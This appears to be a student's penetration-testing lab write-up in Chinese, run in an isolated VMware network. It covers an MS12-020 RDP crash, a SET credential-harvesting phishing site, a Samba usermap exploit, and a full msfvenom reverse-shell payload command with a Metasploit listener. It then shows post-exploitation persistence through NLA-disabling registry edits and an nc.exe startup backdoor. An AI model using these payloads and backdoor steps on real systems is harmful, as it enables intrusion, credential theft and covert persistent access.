网络攻防实验 -- 渗透测试作业二
1.蓝屏攻击 MS12-020
漏洞针对 win7、windows XP, windows server 2008 等系统的3389远程桌面服务(RDP)
搜索对应活跃主机win7蓝屏漏洞端口
win7 开启远程桌面设置

services.msc

网络信息
VMware 仅主机模式,保证主机、win7虚拟机、kali在同一局域网下
-
主机
VMnet0 ip : 192.168.137.1 -
win7
ip:192.168.137.129 -
Kali
ip:192.168.137.130
nmap 扫描win7端口

Nessus 执行漏洞扫描
/bin/systemctl start nessusd.service

Metasploit 漏洞利用
msfconsole




Armitage
Armitage是一款图形化的Metasploit界面,它的原理是基于Metasploit框架,通过快速生成、执行各种攻击模块来进行渗透测试或攻击。Armitage通过Metasploit提供的各种攻击模块,可以对目标主机进行扫描、漏洞检测、漏洞利用、提权等各种攻击操作。用户只需要在Armitage图形界面中选择想要的模块,就能快速生成一个针对目标主机的攻击任务,并且可以实时查看攻击结果
msfdb init

扫描活跃主机


选择 dos/windows/rdp/ms12_020_maxchannelids

2.使用社会工程学制作一个钓鱼网站
setoolkit
命令
setoolkit
-
1 Social-ngineering Attacks
-
2) Website Attack Vectors

3)Credential Harvester Attack Method

-
1)Templates
-
设置凭证收集器(攻击机)的IP地址:

受害机登录该网站

攻击机成功监听到受害机的用户名和密码

3.对metasploitable渗透攻击—利用Samba服务漏洞
Samba是在Linux和UNIX系统上实现,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。Samba服务对应端口有139、445
nmap 扫描开放的端口及服务

用 usermap 的脚本进行攻击

设置 rhosts, 渗透攻击Samba服务

4.分别通过发送一个网址链接和监听软件实现渗透攻击
使用 Metasploit 的 multi/handler
进行监听。

setoolkit 创建钓鱼网站链接

监听软件
创建恶意payload, 命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=4444 -f exe -o payload.exe

创建监听器 , use exploit/multi/handler
, set payload windows/x64/meterpreter/reverse_tcp

建立会话

可执行的一系列命令:
pwd
cd C:\\
cat C:\\file.txt
upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt
download C:\\Users\\user\\Desktop\\something.txt /tmp/
getuid
execute -f calc.exe
#The shell command allows you to interact with the remote machine's command promp
shell
sysinfo

5.利用扫描目标主机上的一种漏洞实现后渗透攻击
利攻击方kali:192.168.137.130
受害机win10: 192.168.137.133
端口扫描,开放445端口,提供smb服务
加载攻击模块
后渗透维持权限
后渗透的目的是长久保持对目标的权限,主要手段是植入后门
background
: 把当前连接保存到后台不退出连接
加载后渗透模块enable_rdp 创建目标主机RDP用户
如果目标主机开启NLA,建立的RDP账号将不能通过RDP连接到目标主机
查询目标机注册表来确定是否开启了 NLA。
根据查询结果 SecurityLayer(2 )和 UserAuthentication (1)的值,可以知道目标机开启了 NLA以上说明目标主机上的NLA(网络级身份验证)处在开启状态,不能够直接用rdp连接目标主机。
reg -h # 查看帮助
-k #注册表的路径 -v 键的名称 -d 键值
reg enumkey [-k <key>] # 枚举注册表的内容
reg createkey [-k <key>] # 创建注册表项
reg deletekey [-k <key>] # 删除注册表项
reg setval [-k <key> -v <val> -d <data>] # 在注册表里添加内容
reg deleteval [-k <key> -v <val>] # 删除注册表的值
reg queryval [-k <key> -v <val>] # 查询注册表的值
通过修改注册表将 SecurityLayer 和 UserAuthentication 的值修改为 0,就可以关闭NLA。
rdesktop 192.168.137.133 -u chenjingjing -p 123456
建立 rdp 连接
远程桌面连接成功
修改注册表启动项长久维持权限
直接利用漏洞获取目标权限不稳定,为长久的获取目标主机的权限,需要通过植入后门来实现。
通过已获取的权限上传后门
在kali主机上利用已经获取的shell上传nc.exe
注册表添加启动项执行 nc 反弹 shell 命令
运行shell,执行windows命令修改防火墙
重启win10,443处于监听状态
成功获得 shell
本文作者:chchee
本文链接:https://www.cnblogs.com/chchee-blog/p/18514453
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步